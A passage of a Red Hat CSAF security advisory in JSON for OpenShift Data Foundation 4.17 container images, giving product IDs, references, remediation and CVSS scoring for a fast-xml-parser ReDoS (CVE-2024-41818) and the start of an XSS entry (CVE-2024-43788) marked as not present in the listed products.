"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-41818"
},
{
"category": "external",
"summary": "RHBZ#2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-41818",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41818"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v"
}
],
"release_date": "2024-07-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: ReDOS at currency parsing in currency.js"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
